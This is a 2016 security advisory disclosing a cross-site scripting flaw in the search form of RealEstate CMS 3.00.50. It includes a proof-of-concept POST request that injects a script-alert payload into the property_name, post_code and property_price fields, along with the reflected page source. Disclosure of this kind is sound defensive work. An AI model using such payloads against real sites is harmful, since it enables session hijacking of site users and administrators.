RealEstate CMS 3.00.50 Cross Site Scripting

`i>>?Document Title:  
===============  
RealEstate CMS 3.00.50 - Cross Site Web Vulnerability  
  
  
Release Date:  
=============  
2016-09-08  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2016-09-23 : Public Disclosure  
  
  
Product & Service Introduction:  
===============================  
RealEstate CMS is a web portal script designed for realty agents , realtor or brokers to sell , buy , trade , rent and letting their client's property through online. It is a web based Content Management System integrated web application platform developed in php, mysql used by real estate companies to promote properties. Feature-rich, SEO-friendly, easy to use interface with Protected admin area to create.  
  
(Copy of the Vendor Homepage: http://www.script4realestate.com/ )  
  
  
Affected Product(s):  
====================  
Product: Realestate v3.00.50 - Content Management System  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
Medium  
  
  
Technical Details & Description:  
-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-  
A client-side cross site scripting web vulnerability has been discovered in the official Realestate v3.00.50 content management system.  
The vulnerability allows remote attacker to inject own malicious script codes on the client-side of the vulnerable module or service.  
  
A client-side cross site scripting web vulnerability is located in the search engine. The web vulnerability could allow an attacker   
to execute javascript in the web-browser of the user or administrator to compromise session credentials. The attacker can connect   
to a third account to trigger the issue without knowing the password.  
  
  
Request Method(s):  
[+] POST  
  
  
Vulnerable Module(s):  
[+] Add (Input)  
  
  
Vulnerable Parameter(s):  
[+] property_name  
[+] post_code  
[+] property_price  
  
  
Proof of Concept (PoC):  
=======================  
The vulnerability can be exploited by remote attackers without privileged user account and with low user interaction.  
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.  
  
--- PoC Session Logs [POST] ---  
Status: 200 [OK]  
Host: realestate.localhost:8000/  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:48.0) Gecko/20100101 Firefox/48.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://realestate.localhost:8000/  
Cookie: PHPSESSID=8897722dac6adcebc9a966069e91ea83; __unam=6aaa37b-1570a42f57e-507aafb3-2; __utma=261436815.141070340.1473345943.1473345943.1473345943.1; __utmb=261436815.2.10.1473345943; __utmc=261436815; __utmz=261436815.1473345943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1  
Connection: keep-alive  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 529  
block_search=search&property_name='"/>></script><script>alert("vulnerabilitylab")</script>&post_code='"/>></script><script>alert("vulnerabilitylab")</script>&category_id_arr%5B%5D=any&property_type=any&property_price='"/>></script><script>alert("vulnerabilitylab")</script>&property_price-gte=any&property_price-lte=any&feature_room_no-gte=any&feature_bathroom-gte=any&country_id=227&state_id=any&area_id=any&property_owner=any  
  
  
--- PoC: Source ---  
<div class="form-group">  
<label>Post Code:</label>  
<input type="text" name="post_code" id="post_code" placeholder="Any" value="'"/>></script><script>alert("vulnerabilitylab")</script>" class="form-control">  
<input type="hidden" name="block_search" value="search" />  
</div>  
<div class="form-group">  
<input name="property_name" id="property_name" operator="contains" type="text" placeholder="Property Name"  
value="'"/>></script><script>alert("vulnerabilitylab")</script>" class="form-control"/>  
</div>  
<script type="text/javascript">  
//<!--  
{field: "property_price", operator: $("#property_price").attr('operator'), value: ""'"/>></script><script>alert("vulnerabilitylab")</script>"},  
//-->  
</script>  
  
Reference(s):  
http://realestate.localhost:8000/  
  
  
[+] Disclaimer [+]  
===================  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.  
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.  
  
  
Domain: www.zwx.fr  
Contact: [email protected]   
Social: twitter.com/XSSed.fr  
Feeds: www.zwx.fr/feed/  
Advisory: www.vulnerability-lab.com/show.php?user=ZwX  
packetstormsecurity.com/files/author/12026/  
cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/  
0day.today/author/27461  
  
  
Copyright A(c) 2016 | ZwX - Security Researcher (Software & web application)  
`